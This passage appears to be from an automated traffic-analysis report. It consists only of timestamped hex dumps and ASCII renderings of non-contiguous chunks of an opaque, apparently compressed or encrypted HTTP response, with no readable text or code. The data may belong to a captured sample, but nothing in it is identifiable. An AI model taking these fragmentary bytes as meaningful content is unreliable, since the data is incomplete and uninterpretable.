                                                                                              Data Ascii: DQ9sXY g#ESJ.8|]-x}A4'kp38f3L(h'/O#Iwp^p@n% L^zzDT^`Pe]WGz0iX7_/^xDDE !DRyA%&6u.v/M
                                                                                              2021-12-13 23:57:14 UTC3568INData Raw: 47 60 21 38 de c3 af b6 f9 b4 d1 57 c7 de 3c 8d 6d 51 ab e0 c4 30 5c 07 16 b9 60 7c 97 c2 15 03 00 fc be c6 3b c1 2c 93 5d f5 16 88 6e f2 73 e1 a4 08 94 1c d6 56 b9 94 bf 2e 08 78 70 c8 ec 74 d3 67 ec 1b 9d 13 1d 7a d1 36 72 6b ed 11 b2 f9 71 5a 13 f9 10 20 f8 ff 61 08 93 e2 97 c4 5b c6 e5 d1 90 7b 9c a4 cd 5e 6f b0 82 de 31 80 98 78 d0 d7 f9 84 df 80 fb d2 7f 5c 8d 65 a7 5a 31 d7 af 8b 28 8c 46 a8 fc 7d 70 f8 4b 72 c8 e4 0f b8 1a 25 24 76 77 4d b3 bc 5f fa ad b0 48 13 f2 ef 4a cc 72 0c 60 8d b6 f1 01 75 30 ee c0 83 3d 81 00 9d 3d 84 ad 9c 10 a4 8d 91 34 09 e6 cb 58 f4 09 6d 24 1c 52 02 e6 d4 0b 22 15 18 22 78 e2 68 d0 10 01 cb e6 87 87 bd c3 2a 76 e8 60 a7 6e ae d4 00 e7 46 e7 4e 57 48 1d f0 b0 fa 69 ce 45 8d 7f c2 9a f1 16 5b 3e 75 57 a0 34 43 14 88 7d
                                                                                              Data Ascii: G`!8W<mQ0\`|;,]nsV.xptgz6rkqZ a[{^o1x\eZ1(F}pKr%$vwM_HJr`u0==4Xm$R""xh*v`nFNWHiE[>uW4C}
                                                                                              2021-12-13 23:57:14 UTC3569INData Raw: 93 b7 e8 61 ac 4e a9 a6 f8 eb 6b 13 24 e3 65 52 23 00 a9 77 54 3b 57 08 66 ca 26 ff 24 e8 c2 cd 70 fb 85 d8 d1 ef 64 e0 73 d0 0e 69 ec fe bb e4 a8 65 e2 96 f3 ca d7 d5 c4 c9 b1 c4 5f b5 38 e4 b4 81 ac 33 48 db 6a 59 1e 1e fe 55 92 7b e8 bd 50 65 e3 b7 8c 9a 17 bc c3 03 63 04 f8 dd 58 a6 04 b3 48 bc 0d 73 b1 7b 0d e8 48 26 9d 5b a0 c9 52 49 22 89 0c 5c 13 01 36 df a8 29 b7 7f 69 40 40 b8 28 7a 51 f7 cd e1 c7 ca 7b ae ad b5 e1 e0 2a 70 ab 10 69 6d 74 84 60 aa ad ca ad 77 12 2e 5d 33 7c 4f ed 84 66 65 93 b4 da 1d ad 59 93 cf 61 e2 db 2c 32 ce 31 fe 8f 6d 33 45 25 e3 3b f3 b9 92 49 38 1f 4e 1e ed c3 82 dd 72 2f eb 04 3c a7 1d ee a5 4a 88 04 6f e4 26 1b 90 eb 10 9d b7 05 43 ed 98 94 3e d0 c2 f3 bd df fa e3 fb 2b 6c 89 b2 fe 6f b1 cc 69 71 0d da 3e 88 c7 f8 c3
                                                                                              Data Ascii: aNk$eR#wT;Wf&$pdsie_83HjYU{PecXHs{H&[RI"\6)i@@(zQ{*pimt`w.]3|OfeYa,21m3E%;I8Nr/<Jo&C>+loiq>
                                                                                              2021-12-13 23:57:14 UTC3585INData Raw: 9f be 01 35 c2 f0 e4 43 9a 8b fe 7d 13 0f d3 52 bf 82 cb 36 4f 70 a7 52 9e 18 1b 6e 6f 19 f0 4c 7e 1d dc cf 6f be 05 22 e5 e8 31 6e f9 9e 73 e8 e9 65 47 35 56 dd 85 e1 cd fb f1 c0 ec d1 bb 67 24 66 1d b3 19 3e 15 c5 76 1f 85 75 48 67 cd 7a 88 3d 60 f1 74 be ed be 45 e0 e1 1e 3a 5d 97 e6 bd 82 1d 7b b5 ed 90 b9 f0 d1 93 85 44 ec 9a f7 30 36 27 74 ab 6d 34 62 6f 4b 91 b5 b4 83 60 ba ed 26 12 ea 85 b7 b8 a4 a7 ab 11 0c 9a 70 c9 fc 8b b1 1f 84 ec 63 0d 93 1f fd 16 4f 58 77 e6 00 63 51 ef 76 7b 7d 70 3a 22 61 a4 35 ac ec 5b 6e ad b5 62 a0 24 62 43 51 99 6a e9 9a ea ca b9 15 23 e6 31 ca 6f 01 6c 37 40 3d df 1a cd 08 c7 3b b9 af 0b 6a 5a 35 3f 63 32 5d ae f2 42 35 45 55 9f 07 df c2 6a e8 10 db c7 bc 57 d8 68 1c c6 68 d5 45 04 2a af 65 35 36 82 0b 8c e9 27 29 fe
                                                                                              Data Ascii: 5C}R6OpRnoL~o"1nseG5Vg$f>vuHgz=`tE:]{D06'tm4boK`&pcOXwcQv{}p:"a5[nb$bCQj#1ol7@=;jZ5?c2]B5EUjWhhE*e56')
                                                                                              2021-12-13 23:57:14 UTC3586INData Raw: 6a d1 49 e1 e7 e0 2c 13 de 78 a6 43 a8 e1 43 ac 5b 5d 12 30 71 25 ed 05 34 f8 6f 7e 8e c7 36 bf 09 c9 3b 87 93 e1 cd b3 e2 5d 46 1e a8 e9 ae 20 39 46 6b ad af 2e 1e d6 a1 16 3a 55 35 b0 e6 74 83 c1 cf 07 e1 98 92 da bb c7 37 fd bc 89 60 ac e0 af fd 64 aa 4f 10 4c ca 9c b2 21 0c ab 6b 35 6d 4f d6 f3 bd 0f bc 36 e6 ab 35 39 9b 93 f8 41 3d 6f e7 bc 69 f9 ac 27 87 68 e1 e1 95 e4 fc 41 13 0d 91 d9 3b 8d 6c 40 bc 92 e0 3d 2f ef d1 62 59 83 b5 f9 9e 11 d9 c2 6a b2 95 6e d4 a3 55 5a 89 05 1f c8 c4 a8 68 84 26 d2 bb 4b 16 2b 7f 58 fa 72 34 47 29 13 86 46 60 fe 71 d1 04 75 4f ce 52 f5 79 55 d9 1d 24 a7 f5 04 59 26 73 57 e0 19 04 dd 36 0a 37 9b 6e 9c fe 05 71 35 ba 09 de 55 25 56 4a 02 9b 7a b7 6b 9f 8d a5 4f 90 3d 0f 08 2b 33 f9 64 ed 20 5e 16 bb b5 7e 68 9c f0 8c
                                                                                              Data Ascii: jI,xCC[]0q%4o~6;]F 9Fk.:U5t7`dOL!k5mO659A=oi'hA;l@=/bYjnUZh&K+Xr4G)F`quORyU$Y&sW67nq5U%VJzkO=+3d ^~h
                                                                                              2021-12-13 23:57:14 UTC3602INData Raw: 4c 15 5d c7 3c 30 d6 90 ea 1f 3a 82 7d 4c 04 93 f3 87 03 5c 92 31 30 45 bb 7e 1d ed 2f 6b 1f c5 e9 5b 97 9f ab 54 20 a9 c9 34 6e 95 bf 1a ba 35 00 1b ad e7 33 a9 19 cf 62 d6 6d fc 40 97 7a 1a f4 b3 2f 7a e3 a8 1a f0 e0 6a e1 63 5f a2 a9 8b b1 aa a0 b4 1f 10 d4 98 1f 89 83 46 23 9a 72 7e 49 d2 c2 3e ed 90 72 fd 8a d8 00 01 f1 b1 68 8e 2b 0d 3b be 13 6a 52 36 ad 7a 6f 74 13 a6 93 67 c4 7c 3e 9c c8 98 62 c7 e6 89 a8 6a 4f c7 61 aa 54 67 64 27 3f 00 1b 87 c5 bf 18 b1 03 87 aa 13 6e 13 1d 13 3a b3 f0 52 5b a1 05 14 e3 47 9b c6 a7 62 23 11 ab 7b cf 0b 7d 0b bd f9 c3 ec 62 28 ca 90 c8 49 c6 7e 0d ac 14 29 50 a9 c7 74 6c 8f 51 bb 0c 60 b1 2b 7c bb 08 cc 07 04 50 2d a0 93 6b 10 61 6d 6c 1f b6 d7 70 4b c9 bc 89 af 7d ed ac ab 1f 4d 09 06 2f 36 92 1d 51 0d 18 5a 30
                                                                                              Data Ascii: L]<0:}L\10E~/k[T 4n53bm@z/zjc_F#r~I>rh+;jR6zotg|>bjOaTgd'?n:R[Gb#{}b(I~)PtlQ`+|P-kamlpK}M/6QZ0
                                                                                              2021-12-13 23:57:14 UTC3603INData Raw: 1b 20 8e bc ba 44 7a d9 d1 0c a5 3e 00 8a 32 a7 d2 6c 72 43 b4 de b5 ad 8d f5 dc a8 49 a6 78 0c 32 c6 0e 4b 33 c5 98 a0 fd d6 d1 8c 94 e4 bd 36 6a a3 49 48 ad a0 c8 35 53 22 d5 35 3c 0d b8 0f ce 30 0a 49 bc 2c 54 a9 3e c5 a5 15 d4 05 06 47 97 0f 00 f1 a3 d5 05 1e 27 fa b8 6f 00 61 fe ef 93 c1 ad 87 89 06 bd e6 b8 ff c2 ba f9 47 d3 d4 3b 0d 24 e5 ba f7 2c c6 41 1f 2e 93 0b 3c f1 e5 42 98 75 86 90 c2 b3 d8 07 24 7c 9d eb 8f c3 1b 47 88 d1 5c a8 a3 d7 f0 a5 68 62 b8 e7 6f 09 ee 9d 2b 3c 67 14 c0 6c 21 0f dc 18 4d b0 ee 02 83 ff 70 14 d8 ef 1b e2 4d a0 84 06 87 cd 2c 0d 8c a2 f0 3a 83 ee c8 b7 f4 3b c0 9c 21 ea 01 bc 55 9e 07 1b a8 16 f0 d2 6b 23 65 cb 82 2c 1e 7c e0 d5 9a de d7 e8 d5 c9 56 86 87 41 9a 39 e8 a9 21 b9 49 c7 64 77 3d fc 02 05 28 c6 b2 36 a1 c4
                                                                                              Data Ascii: Dz>2lrCIx2K36jIH5S"5<0I,T>G'oaG;$,A.<Bu$|G\hbo+<gl!MpM,:;!Uk#e,|VA9!Idw=(6
                                                                                              2021-12-13 23:57:14 UTC3619INData Raw: 01 4d 38 aa 6c 48 62 19 e4 6d a8 16 f1 a3 20 57 68 ff a3 c0 e4 d4 5e 7b d7 ab 29 2b a0 57 7d f2 8a a8 65 90 f8 98 a4 b8 0c 71 ea c0 ff 10 7a c1 0e 0e ab 5b d0 5c c9 2e 62 85 23 a9 84 c1 77 c2 ce e3 7a d2 e2 4c 5f 41 04 57 ee d2 21 5f 8d 42 4f a5 5b 0d 6e 2f fc c9 01 4d d9 ee 6b a2 44 c3 e0 c8 11 2a 26 70 32 27 3e 2d b0 35 b2 1f 12 de de d0 35 e4 29 6a ee df 99 2a eb 8b a1 42 10 68 1d 5a 16 e3 dc 0b ab b8 4e bd 2b d7 db f4 fd 92 ad f1 a9 5e ba d7 2a a5 80 43 f2 a5 35 ab aa 70 51 4c db a6 5a 5f 78 0d 5e 47 1e f7 ab 82 b0 eb 7a 04 a3 02 d6 e0 c2 01 e4 ba b5 74 4a cd 5f 05 93 c2 01 d1 e5 dc 63 9a 1b e2 07 d9 f1 4b 23 fc 71 e8 53 03 32 46 e9 05 87 93 78 9d 06 b9 ae 7f 65 dd 2d 21 59 9e 06 1f d7 55 4b 96 9d 92 a8 a8 c3 22 80 7a 2e fc d1 29 3d 8c 95 f9 29 89 73
                                                                                              Data Ascii: M8lHbm Wh^{)+W}eqz[\.b#wzL_AW!_BO[n/MkD*&p2'>-55)j*BhZN+^*C5pQLZ_x^GztJ_cK#qS2Fxe-!YUK"z.)=)s
                                                                                              2021-12-13 23:57:14 UTC3620INData Raw: dd fa 8d 30 be 59 c4 4d 42 a7 e1 22 c5 34 92 fa e6 bb 96 5b c9 a1 78 6e dd 2c 16 2e 7d ba 78 5c 24 70 3d 1c 1c 24 cd 09 cc 27 5b 0d f8 71 29 5f 1d 40 d0 a3 5d 7b 0b f0 06 ce fa 2a 86 97 e3 0d 8a a0 b1 7a 62 34 f8 ce 7c ec 9c e7 38 b4 da 80 f3 de d4 60 db 5e 88 19 6a 10 d6 c2 41 8c 9f cc aa a0 9b 16 fa a5 2f ac 9f 03 18 fb 82 2a 22 13 f4 7e 7d 4f ac a3 28 bb 68 0c 94 36 b6 2d b8 f4 97 ee b7 06 1e 03 35 81 b4 8b 48 f8 5d 21 32 95 84 7f d0 0e c9 83 af 56 2d 85 fe 18 a3 ec 3c d8 02 f4 44 a9 82 27 72 59 87 16 8e fe c6 fe f0 02 0e 5e 61 3e 64 52 a5 23 79 12 74 63 56 b2 4a 9a ce db 64 76 cc a8 d6 8e 2a 62 4d 5c 0c 2c f5 55 1d a7 a4 90 6e df 6d ce a0 8c b7 7c 90 bb 58 38 0c bf c8 c4 d8 bc 59 ab 3a 61 d3 57 04 fb ce 86 24 8e ac f8 2b 48 8e 98 9b 76 d5 5b 9d fd 05
                                                                                              Data Ascii: 0YMB"4[xn,.}x\$p=$'[q)_@]{*zb4|8`^jA/*"~}O(h6-5H]!2V-<D'rY^a>dR#ytcVJdv*bM\,Unm|X8Y:aW$+Hv[
                                                                                              2021-12-13 23:57:14 UTC3636INData Raw: b7 fb 4c 62 3e a4 6e 34 c9 41 1f 9e 48 00 b9 cb 94 56 86 33 fa 43 45 f6 c9 f6 26 87 8e 74 da 04 54 51 f6 53 43 46 64 b8 10 69 4a 61 16 1c fe da ae 65 80 8b b3 0a a1 ac 66 80 b0 fa ac c8 c0 b0 8a fe 51 65 d1 f9 2b db ab af e0 9c 4c 4a ba e6 13 cf df 10 e3 ac 28 d2 b2 c0 a8 28 e1 15 ff 68 f6 9d 56 3a 1c 81 6a 95 8c be 52 51 1f bb 48 90 44 24 7d 3d 29 03 85 e9 8f 95 41 65 16 97 b1 05 01 7c 50 e1 88 6d 2d 05 1e 48 ed 25 3b 96 89 70 7d 50 66 89 0f 0b af 24 fa 02 bc 46 9c 1f fb db c8 6c f9 bc 43 55 c6 e2 66 40 1f 1c e0 6b c1 be 6d 07 84 a3 7f c2 51 0e 9d 87 3a 29 85 a9 34 ac c6 73 56 1b 9b 58 cb 3d b5 69 72 c6 ae ac a1 7e 8c f9 72 28 4a 88 80 09 5d e9 c8 82 9f 3e ca 32 79 7a 8d 3b 6a e1 1e 75 98 57 f6 63 b3 55 ae db 18 9f 28 5d bc 14 69 d3 25 9a e0 e8 3c 39 f7
                                                                                              Data Ascii: Lb>n4AHV3CE&tTQSCFdiJaefQe+LJ((hV:jRQHD$}=)Ae|Pm-H%;p}Pf$FlCUf@kmQ:)4sVX=ir~r(J]>2yz;juWcU(]i%<9
                                                                                              2021-12-13 23:57:14 UTC3637INData Raw: 86 fd 87 60 ec 7e f1 d5 5f b3 bd f4 11 af b3 c9 9a 61 d5 e7 7f 54 6b 9b d3 90 45 1f bd 59 36 f2 5c b6 c0 21 be 33 f2 98 e7 cc 2b 40 06 1b 39 1c 01 e5 e1 36 d9 12 08 84 43 cc 69 9f c0 bf 1a 8e 54 80 bb e4 34 89 e2 fd 01 15 26 bb 17 1c bc 31 f2 a9 f6 c7 2a d1 fd 62 f6 eb a5 a7 1a 4e 85 a1 a0 7b 02 df b5 cb c8 52 d3 29 f9 f8 65 ec 79 be 7d 35 16 44 26 2e 5c 9f 9d 6a de 69 12 86 37 b7 ce 14 bb 09 e8 2f 15 7c 82 5e 94 6a 69 a1 05 e8 8f 98 c3 16 f6 c2 ed 87 34 b4 7d 19 40 30 9a 9b cc 74 14 06 34 32 12 d7 eb f2 54 17 39 88 c5 1b 1a 2d d8 82 f1 e5 3b 4a 49 4e 42 d6 8c cf 90 3c 98 d3 5c 81 1b 1f ff 51 3a 24 27 30 c1 7d 0f 70 13 d5 c7 3c de 12 d6 54 e6 44 7a 60 24 ae 90 30 78 b4 74 b3 3d 1a 89 37 8f 93 2f 1f 82 57 00 db 34 1e ac 22 1d a8 16 e7 48 d0 4e 49 95 fe 2b
                                                                                              Data Ascii: `~_aTkEY6\!3+@96CiT4&1*bN{R)ey}5D&.\ji7/|^ji4}@0t42T9-;JINB<\Q:$'0}p<TDz`$0xt=7/W4"HNI+
                                                                                              2021-12-13 23:57:14 UTC3653INData Raw: e8 cf d4 2b f8 b0 df bd ff a4 9b 1d ab 2d 16 5c d2 6d 81 eb d8 13 12 66 b6 cf ec df f6 39 7e 2b 49 fb 5a cf 49 2e 9b 3a 8e 11 fa d5 3d a0 e8 a5 98 e1 ff 75 5e 1b 9d 5b be eb c2 df 55 cd e8 3f ab 3f 82 01 a4 d9 b1 26 0c bc 62 7d f8 7f e9 15 84 51 7e 81 9b eb f6 ef ec 1f d8 69 6c b9 f3 3c c2 4c df 21 38 97 05 86 54 7e 65 bb e2 4d d0 6b 32 e6 e8 2b 0d 99 be 32 1b 04 b8 ed 82 bc 2d ff 6a 77 c3 f5 e0 26 f9 0e f6 5d 7b 7a bd 88 f9 7f 98 17 41 9d 74 dd 62 a2 39 ec 52 f6 7f 56 21 ef 3e 63 ca 8d 59 fe 59 b5 37 7b 5b 3c a1 ef e4 e0 d2 2e 65 14 7b bd 7c 1f 3c 7d 39 2f 82 5a c3 fc d5 a7 ff 81 d2 9c 11 f5 64 1b 02 ab 86 49 1c f8 a1 09 a7 ee aa d5 f0 ed df 39 95 b9 3e da fd 99 d1 77 db 13 4b 23 2e 68 98 b0 84 c3 57 08 bf b5 dd f8 58 43 f2 de c4 31 05 cf 0e 4e 13 4c cb
                                                                                              Data Ascii: +-\mf9~+IZI.:=u^[U??&b}Q~il<L!8T~eMk2+2-jw&]{zAtb9RV!>cYY7{[<.e{|<}9/ZdI9>wK#.hWXC1NL
                                                                                              2021-12-13 23:57:14 UTC3654INData Raw: a6 3c 7a bb 3a d5 ea 4b d7 52 ef a4 c8 72 44 dd 85 f4 12 df 16 4d aa 37 ac 56 e3 ec 45 ca 07 ef c1 71 39 ce 48 5e 0a 6e 71 7e 73 b4 17 22 c8 14 d6 ef 0c e2 9b 09 63 3f 2f 82 36 d2 3f 06 45 97 e0 d8 6f 15 64 aa 02 68 71 79 e8 c3 06 9d 2f 12 d8 1b 1c f1 ed 02 b7 80 3d 35 9d 2b 8a 87 73 61 0b 2c be 69 3c a5 f7 03 95 47 2e b9 ca 8f 04 46 4c bf 27 48 14 cf fd 3e 63 04 36 b6 d0 c7 21 88 da 42 e7 3e 74 b3 58 38 c9 72 84 c5 64 72 e0 ff 86 f0 60 23 44 7c de 59 bb c1 51 6f cd 43 61 df 7d 09 3d 02 df 72 07 a5 ba e7 09 bc 91 36 8a 16 c8 44 8b 7a 15 1f 63 0d e3 57 eb 2e 62 3e 7f fb 45 11 19 e8 12 97 54 3d dc 80 52 75 d6 1e 7d 14 8b e2 cd b5 3c a7 f4 c9 27 51 2b 66 d7 00 28 a1 e8 ca 10 7b 2d 5d 93 f0 0a e5 bb 63 2c 32 c4 61 eb 0a 2f b3 6f d2 9e 2b 60 8a 71 f7 68 8e 14
                                                                                              Data Ascii: <z:KRrDM7VEq9H^nq~s"c?/6?Eodhqy/=5+sa,i<G.FL'H>c6!B>tX8rdr`#D|YQoCa}=r6DzcW.b>ET=Ru}<'Q+f({-]c,2a/o+`qh
                                                                                              2021-12-13 23:57:14 UTC3670INData Raw: 00 98 31 72 1d 09 19 ad c8 3d 1a 77 fc 1b f7 b6 16 49 8d 99 5c af 26 b4 fa 03 b1 bc 0b 80 7e ab de 71 b3 ff 16 f9 1a 1f a3 36 90 e6 0e fb 82 e4 31 37 40 39 b8 5e f3 da 41 c2 50 2e ad 79 62 f8 13 9d e7 77 c9 d8 12 a3 3e d7 05 32 39 2b f6 82 6d 6b 36 8b 17 72 85 2e c5 2d da af fb 17 85 a6 37 6a cc 15 0d 5f 1a 80 2c 4e 13 cc 9e 6a 2e f4 c1 06 01 fb d7 4a b8 7f 3c 93 9c 09 a7 12 38 96 5d 72 0c 94 1b 70 af bb 53 99 11 0a ab 8f 3b d1 70 01 63 a8 cd d0 cf 7b 9d a4 66 9f 72 50 56 01 b3 b0 3b 9e 67 8a 75 69 9a 53 0e a1 6d ba a4 09 b6 06 c2 fc 90 96 ec 3d dc d8 ac 61 12 13 e4 2e 3c 16 30 46 31 42 0e 5e 39 4a f7 f7 f6 41 84 36 92 2c 73 38 5c 18 2a 53 61 2d 08 30 28 30 97 19 77 eb 8a be 82 73 d5 ac 75 28 6a ca 25 03 5a 95 9b a2 f1 a6 cf 3a 93 2b 79 63 f4 e2 e4 f7 84
                                                                                              Data Ascii: 1r=wI\&~q617@9^AP.ybw>29+mk6r.-7j_,Nj.J<8]rpS;pc{frPV;guiSm=a.<0F1B^9JA6,s8\*Sa-0(0wsu(j%Z:+yc
                                                                                              2021-12-13 23:57:14 UTC3671INData Raw: e3 bc 4f 0b d0 de ec c4 b9 58 4a 04 7b 82 4a 99 cd 4c 5c e0 08 e5 ad 3d 9b 20 26 46 17 29 a2 79 05 fd 33 dd fc c9 17 8a 82 fb a0 1f a1 43 17 69 c5 11 18 69 82 9a 7c fd 7f aa a8 8b ad 69 b3 8c ee 95 8f 7c b4 18 2f 63 34 39 c9 ed 91 ac aa 5c 3a f1 63 f6 7a 97 29 4c 75 b9 7a e5 3d c1 fa e6 b9 c4 dc f2 b0 92 b5 ee 08 96 05 19 84 f1 a4 7a e6 0d ea 1b 2b d0 ec d0 a7 3f 89 10 d8 4f 94 36 d1 5b 59 69 5b 1d 40 52 c5 aa 1a 85 96 7c cc 33 3a 8e 1e 54 6d 99 d1 ee 07 21 5a 0f 72 c5 03 84 62 7b f1 5b 33 58 2b 69 4b f8 e5 11 be 49 12 38 7a 56 be 0a 40 8f 7e ed 49 c0 d5 95 13 22 71 26 c7 99 22 fe bd b3 b1 66 f3 3b 3c 71 4c 32 96 b6 e1 17 55 e8 f5 23 09 74 ee 0c fd bf da 66 16 09 68 c5 b0 72 32 ca 85 59 89 26 74 a6 dc dc dc aa 86 a0 53 66 88 8e 83 6a 94 b2 b4 1a 2d 40 2e
                                                                                              Data Ascii: OXJ{JL\= &F)y3Cii|i|/c49\:cz)Luz=z+?O6[Yi[@R|3:Tm!Zrb{[3X+iKI8zV@~I"q&"f;<qL2U#tfhr2Y&tSfj-@.
                                                                                              2021-12-13 23:57:14 UTC3687INData Raw: 62 1e 55 32 6a ef 6f f5 da 6e fe 3d 38 69 82 28 07 55 1d 41 c5 08 71 54 2e 97 f7 69 8b b4 a7 fc a6 22 93 35 38 18 5a b7 69 30 d9 c3 b7 84 8e 21 27 ea 87 42 9e d2 cb 96 0f af f4 ae 60 00 17 cc 39 73 09 64 a9 32 a3 38 40 08 4b 4d 95 c3 41 89 9b 4f ce 1d a5 a9 aa 99 4a 64 2a 04 f7 58 a6 d6 dc 57 23 ac d6 d5 61 f4 1e 24 3e 14 b2 81 25 98 89 6b 67 6c e7 b8 8d 37 d4 6f f9 93 92 8c 62 dd 5f 88 a1 59 8a a4 4d a6 90 6b 90 b6 17 89 13 ae a6 a2 94 f0 86 3b e7 bc 9a 26 20 02 8c 7a b9 1a 16 15 f9 35 0a 30 e0 3f d1 83 66 bf f9 34 11 18 00 14 13 63 3f f3 88 46 5d 93 77 e0 cb f0 52 b4 b5 52 c2 2b d1 3e e9 4c 8a 67 13 19 55 11 60 2a 31 f1 59 7b c7 3b 80 71 ae 32 73 dd cf be c2 95 0b 18 66 96 c0 e7 75 bc 6a df ad c8 f5 3b f9 7e 98 86 cc 16 70 c2 c4 91 37 3e e5 43 f9 fb c9
                                                                                              Data Ascii: bU2jon=8i(UAqT.i"58Zi0!'B`9sd28@KMAOJd*XW#a$>%kgl7ob_YMk;& z50?f4c?F]wRR+>LgU`*1Y{;q2sfuj;~p7>C
                                                                                              2021-12-13 23:57:14 UTC3688INData Raw: 42 42 64 5a 4e 22 a1 65 1c 10 3c 21 ab 46 dd a8 1b 80 7d 29 92 fc 13 22 10 81 b9 14 80 98 6a 7b 3b ba 5b 77 42 50 c7 1d 3d b4 15 c9 46 42 ab ab df 94 58 90 16 36 1d 03 4e 4f 26 88 da e9 91 16 2b 5d 14 cb f0 37 b6 30 53 9a ef 6b 4d 54 15 3d 87 ec 6a e4 85 62 d9 b9 b6 15 a6 3d a8 4d 29 2c de a1 f2 cf 52 64 7b 95 0d 7b b1 71 23 7b 33 ef d1 17 57 43 e7 64 8c 10 4f 9e 34 a5 5a 14 7c 50 bc e0 bd a8 be c9 8b 83 77 b8 e6 0c 46 3a 7f 4c 70 b4 3d e0 bd f4 46 18 32 6a 73 37 58 8d d3 81 d5 04 c5 14 a5 ec 45 fb 4a 80 69 7c a2 6d 56 39 9e 54 bd 06 d4 56 b7 96 02 2a c6 8b f6 3f 19 2e 2d c8 97 a3 2f 8b 6e e0 d6 a4 f9 e9 18 d7 dc 64 60 12 68 21 a2 8e cb 2c dd f7 54 57 7c ac 85 e3 b1 4d 5b b6 11 60 24 80 0d 16 6f 54 0a a7 1a 19 6a bd 07 ca 4c 56 0e 15 2d d3 1b 84 86 e2 25
                                                                                              Data Ascii: BBdZN"e<!F})"j{;[wBP=FBX6NO&+]70SkMT=jb=M),Rd{{q#{3WCdO4Z|PwF:Lp=F2js7XEJi|mV9TV*?.-/nd`h!,TW|M[`$oTjLV-%
                                                                                              2021-12-13 23:57:14 UTC3704INData Raw: b8 d2 0f 9d 30 f5 bd fe 52 ba 53 0a 58 7b 76 b3 d5 3b d5 11 9d d0 53 4e 44 e9 9e 8e 26 55 26 36 00 25 b8 e6 28 91 c3 f3 e9 b2 cb a4 ee c0 ba 80 82 de c6 e6 90 51 bd 40 f1 2e 38 ae 53 9b e9 f7 27 3d 62 bc aa 8d 53 2b 60 cc 4d d5 a1 90 c5 b7 33 52 6f 01 2e 01 38 f7 1e b1 2c 88 9d d8 a8 57 d9 ef c7 08 63 0a 83 07 5d b0 a6 06 9b 9d 1a 4b 11 de 0d 36 f5 73 2b 23 1e a2 b0 66 16 26 a2 47 b0 f2 16 b8 41 59 91 06 67 42 01 3b 19 e5 90 be b9 77 92 de a1 a8 07 20 45 86 f8 41 1b e0 1a e9 be 4c 64 92 77 a0 8c 04 25 8c 79 6c 3e 39 5b bc e7 6c b7 65 99 f7 91 66 37 f5 3b 8c 29 8c a2 70 a4 65 d6 5b c2 bd 77 92 a4 e9 26 56 00 94 bc 72 e4 07 15 44 1e 82 1d bb ce 81 d7 f6 2b 8c be 27 bf 26 d3 4d d2 7e 5a 43 fc dd 64 c4 84 fd 13 ed 1e 8d bb 90 07 df 94 78 20 94 7f 82 bb fe 1c
                                                                                              Data Ascii: 0RSX{v;SND&U&6%(Q@.8S'=bS+`M3Ro.8,Wc]K6s+#f&GAYgB;w EALdw%yl>9[lef7;)pe[w&VrD+'&M~ZCdx
                                                                                              2021-12-13 23:57:14 UTC3705INData Raw: 0e b0 6f f1 39 e3 10 47 47 8a 0c 73 bd b8 af fc 6f 92 14 98 7e 7d d3 24 db 94 01 f8 22 a5 a5 c5 6b 54 d6 d2 27 07 85 82 a6 c7 9c bc d0 5b 4e 0d a6 4b 97 71 6d 45 2b c2 24 5b c0 e5 87 0c c3 94 b5 83 14 a7 f4 83 75 eb cd d0 3e 47 8e 53 d2 b3 94 44 10 00 7f 98 ab 39 79 6c ea b9 78 4c b1 50 b0 68 31 f7 75 f6 27 38 4e fa 75 20 be a4 6c 90 44 1b 8f 7d ef ee 3b ef f3 68 77 db 4d 09 45 f1 d1 bd 7d 60 12 b4 30 89 99 81 f7 de 2c d5 38 8e b5 1c 46 86 56 a5 d6 51 a9 47 b7 44 a1 d3 97 ae 76 a6 a9 d0 74 1a 83 b9 d5 69 74 cc c8 c7 4c c3 5e 41 f2 a1 20 39 e0 b1 27 f3 2e 88 cd 6d d3 02 f2 77 41 2f 0f 4f f4 0b 46 93 dd 01 2f 52 23 50 f7 a1 fe 3d 79 35 73 ec 8e 7a 7b a3 1a c3 d6 59 c8 3b 7a e2 37 99 8a d8 7a d5 eb db 9d cf c6 6f a4 39 7b 4b e4 1d 28 3c 5d 92 8d fc 27 94 0f
                                                                                              Data Ascii: o9GGso~}$"kT'[NKqmE+$[u>GSD9ylxLPh1u'8Nu lD};hwME}`0,8FVQGDvtitL^A 9'.mwA/OF/R#P=y5sz{Y;z7zo9{K(<]'
                                                                                              2021-12-13 23:57:14 UTC3721INData Raw: bf 14 b6 b3 c8 51 1a fc 9f 91 91 ef 7e 9f ca b1 cf c6 ca fc 79 df 76 3e f8 be f7 f7 d8 95 52 42 2e 3d 46 a5 d7 bc 14 07 40 14 00 2b 4f 57 e3 c3 96 19 c7 ab 26 86 7c cf 34 fd ec ad 61 5a 85 2b 24 6a f9 2c 15 18 57 d1 9e a6 c1 79 70 d3 6c 2f 50 26 ff 07 4d f0 97 93 c2 af 06 4b 97 68 41 49 56 8c 68 5a 52 29 89 c8 d8 3b ed e3 fa b7 b1 51 b4 54 7c 74 9a 09 5b 5a b5 b5 cd c5 98 c6 4f d2 77 40 fb 23 63 92 71 8a 27 24 ea 37 af 9c 65 37 f3 32 84 29 45 37 cd ff 10 02 3e c1 79 7b 90 ba aa 8e 7c c4 c9 0a 95 47 ad c5 73 17 b5 12 26 b7 07 6b e6 cd 70 d7 d0 a9 ce 45 61 18 21 ad e4 a6 5e a3 c0 86 40 6d 63 95 f9 eb 0f 4a f8 fe c4 a2 d3 a7 46 9f 02 7c 75 cd 5f ba 6b 86 92 33 91 2f e2 64 88 c3 85 c1 5a c5 32 db c9 2b 63 3d 4a 5c 02 bd df 7e 0b b3 e8 96 7d 59 7b c5 52 7a e5
                                                                                              Data Ascii: Q~yv>RB.=F@+OW&|4aZ+$j,Wypl/P&MKhAIVhZR);QT|t[ZOw@#cq'$7e72)E7>y{|Gs&kpEa!^@mcJF|u_k3/dZ2+c=J\~}Y{Rz
